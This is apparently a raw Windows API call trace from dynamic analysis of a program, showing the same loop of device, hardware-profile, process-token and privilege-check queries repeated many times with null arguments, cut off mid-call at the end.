[0016.899] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.900] GetLastError () returned 0x578 [0016.900] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.900] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.900] GetCurrentThread () returned 0xfffffffe [0016.900] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.900] GetLastError () returned 0x3f0 [0016.900] GetCurrentProcess () returned 0xffffffff [0016.900] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.900] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.900] SetLastError (dwErrCode=0x522) [0016.900] CloseHandle (hObject=0x114) returned 1 [0016.900] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.900] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.900] GetLastError () returned 0x578 [0016.900] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.900] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.900] GetCurrentThread () returned 0xfffffffe [0016.900] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.900] GetLastError () returned 0x3f0 [0016.900] GetCurrentProcess () returned 0xffffffff [0016.900] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.900] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.900] SetLastError (dwErrCode=0x522) [0016.900] CloseHandle (hObject=0x114) returned 1 [0016.900] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.901] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.901] GetLastError () returned 0x578 [0016.901] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.901] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.901] GetCurrentThread () returned 0xfffffffe [0016.901] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.901] GetLastError () returned 0x3f0 [0016.901] GetCurrentProcess () returned 0xffffffff [0016.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.901] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.901] SetLastError (dwErrCode=0x522) [0016.901] CloseHandle (hObject=0x114) returned 1 [0016.901] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.901] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.901] GetLastError () returned 0x578 [0016.901] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.901] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.901] GetCurrentThread () returned 0xfffffffe [0016.901] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.901] GetLastError () returned 0x3f0 [0016.901] GetCurrentProcess () returned 0xffffffff [0016.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.901] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.901] SetLastError (dwErrCode=0x522) [0016.901] CloseHandle (hObject=0x114) returned 1 [0016.901] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.902] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.902] GetLastError () returned 0x578 [0016.902] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.902] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.902] GetCurrentThread () returned 0xfffffffe [0016.902] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.902] GetLastError () returned 0x3f0 [0016.902] GetCurrentProcess () returned 0xffffffff [0016.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.902] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.902] SetLastError (dwErrCode=0x522) [0016.902] CloseHandle (hObject=0x114) returned 1 [0016.902] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.902] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.902] GetLastError () returned 0x578 [0016.902] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.902] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.902] GetCurrentThread () returned 0xfffffffe [0016.902] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.902] GetLastError () returned 0x3f0 [0016.902] GetCurrentProcess () returned 0xffffffff [0016.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.902] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.902] SetLastError (dwErrCode=0x522) [0016.902] CloseHandle (hObject=0x114) returned 1 [0016.902] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.903] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.903] GetLastError () returned 0x578 [0016.903] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.903] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.903] GetCurrentThread () returned 0xfffffffe [0016.903] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.903] GetLastError () returned 0x3f0 [0016.903] GetCurrentProcess () returned 0xffffffff [0016.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.903] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.903] SetLastError (dwErrCode=0x522) [0016.903] CloseHandle (hObject=0x114) returned 1 [0016.903] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.903] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.903] GetLastError () returned 0x578 [0016.903] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.903] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.903] GetCurrentThread () returned 0xfffffffe [0016.903] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.903] GetLastError () returned 0x3f0 [0016.903] GetCurrentProcess () returned 0xffffffff [0016.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.903] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.903] SetLastError (dwErrCode=0x522) [0016.903] CloseHandle (hObject=0x114) returned 1 [0016.904] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.904] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.904] GetLastError () returned 0x578 [0016.904] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.904] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.904] GetCurrentThread () returned 0xfffffffe [0016.904] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.904] GetLastError () returned 0x3f0 [0016.904] GetCurrentProcess () returned 0xffffffff [0016.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.904] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.904] SetLastError (dwErrCode=0x522) [0016.904] CloseHandle (hObject=0x114) returned 1 [0016.904] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.904] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.904] GetLastError () returned 0x578 [0016.904] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.904] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.904] GetCurrentThread () returned 0xfffffffe [0016.904] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.904] GetLastError () returned 0x3f0 [0016.904] GetCurrentProcess () returned 0xffffffff [0016.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.904] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.904] SetLastError (dwErrCode=0x522) [0016.905] CloseHandle (hObject=0x114) returned 1 [0016.905] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.905] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.905] GetLastError () returned 0x578 [0016.905] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.905] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.905] GetCurrentThread () returned 0xfffffffe [0016.905] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.905] GetLastError () returned 0x3f0 [0016.905] GetCurrentProcess () returned 0xffffffff [0016.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.905] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.905] SetLastError (dwErrCode=0x522) [0016.905] CloseHandle (hObject=0x114) returned 1 [0016.905] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.905] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.905] GetLastError () returned 0x578 [0016.905] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.905] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.905] GetCurrentThread () returned 0xfffffffe [0016.905] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.905] GetLastError () returned 0x3f0 [0016.905] GetCurrentProcess () returned 0xffffffff [0016.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.905] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.905] SetLastError (dwErrCode=0x522) [0016.906] CloseHandle (hObject=0x114) returned 1 [0016.906] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.906] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.906] GetLastError () returned 0x578 [0016.906] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.906] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.906] GetCurrentThread () returned 0xfffffffe [0016.906] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.906] GetLastError () returned 0x3f0 [0016.906] GetCurrentProcess () returned 0xffffffff [0016.906] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.906] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.906] SetLastError (dwErrCode=0x522) [0016.906] CloseHandle (hObject=0x114) returned 1 [0016.906] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.906] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.906] GetLastError () returned 0x578 [0016.906] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.906] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.906] GetCurrentThread () returned 0xfffffffe [0016.906] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.906] GetLastError () returned 0x3f0 [0016.906] GetCurrentProcess () returned 0xffffffff [0016.906] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.907] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.907] SetLastError (dwErrCode=0x522) [0016.907] CloseHandle (hObject=0x114) returned 1 [0016.907] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.907] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.907] GetLastError () returned 0x578 [0016.907] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.907] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.907] GetCurrentThread () returned 0xfffffffe [0016.907] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.907] GetLastError () returned 0x3f0 [0016.907] GetCurrentProcess () returned 0xffffffff [0016.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.907] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.907] SetLastError (dwErrCode=0x522) [0016.907] CloseHandle (hObject=0x114) returned 1 [0016.907] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.907] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.907] GetLastError () returned 0x578 [0016.907] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.907] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.907] GetCurrentThread () returned 0xfffffffe [0016.907] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.907] GetLastError () returned 0x3f0 [0016.907] GetCurrentProcess () returned 0xffffffff [0016.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.908] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.908] SetLastError (dwErrCode=0x522) [0016.908] CloseHandle (hObject=0x114) returned 1 [0016.908] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.908] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.908] GetLastError () returned 0x578 [0016.908] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.908] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.908] GetCurrentThread () returned 0xfffffffe [0016.908] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.908] GetLastError () returned 0x3f0 [0016.908] GetCurrentProcess () returned 0xffffffff [0016.908] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.908] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.908] SetLastError (dwErrCode=0x522) [0016.908] CloseHandle (hObject=0x114) returned 1 [0016.908] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.908] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.908] GetLastError () returned 0x578 [0016.908] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.908] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.908] GetCurrentThread () returned 0xfffffffe [0016.908] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.908] GetLastError () returned 0x3f0 [0016.908] GetCurrentProcess () returned 0xffffffff [0016.909] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.909] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.909] SetLastError (dwErrCode=0x522) [0016.909] CloseHandle (hObject=0x114) returned 1 [0016.909] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.909] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.909] GetLastError () returned 0x578 [0016.909] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.909] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.909] GetCurrentThread () returned 0xfffffffe [0016.909] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.909] GetLastError () returned 0x3f0 [0016.909] GetCurrentProcess () returned 0xffffffff [0016.909] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.909] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.909] SetLastError (dwErrCode=0x522) [0016.909] CloseHandle (hObject=0x114) returned 1 [0016.909] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.909] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.909] GetLastError () returned 0x578 [0016.909] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.909] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.909] GetCurrentThread () returned 0xfffffffe [0016.909] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.909] GetLastError () returned 0x3f0 [0016.909] GetCurrentProcess () returned 0xffffffff [0016.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.910] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.910] SetLastError (dwErrCode=0x522) [0016.910] CloseHandle (hObject=0x114) returned 1 [0016.910] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.910] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.910] GetLastError () returned 0x578 [0016.910] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.910] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.910] GetCurrentThread () returned 0xfffffffe [0016.910] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.910] GetLastError () returned 0x3f0 [0016.910] GetCurrentProcess () returned 0xffffffff [0016.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.910] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.910] SetLastError (dwErrCode=0x522) [0016.910] CloseHandle (hObject=0x114) returned 1 [0016.910] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.910] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.910] GetLastError () returned 0x578 [0016.910] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.910] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.910] GetCurrentThread () returned 0xfffffffe [0016.910] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.910] GetLastError () returned 0x3f0 [0016.911] GetCurrentProcess () returned 0xffffffff [0016.911] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.911] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.911] SetLastError (dwErrCode=0x522) [0016.911] CloseHandle (hObject=0x114) returned 1 [0016.911] SendMessageA (hWnd=0x0, 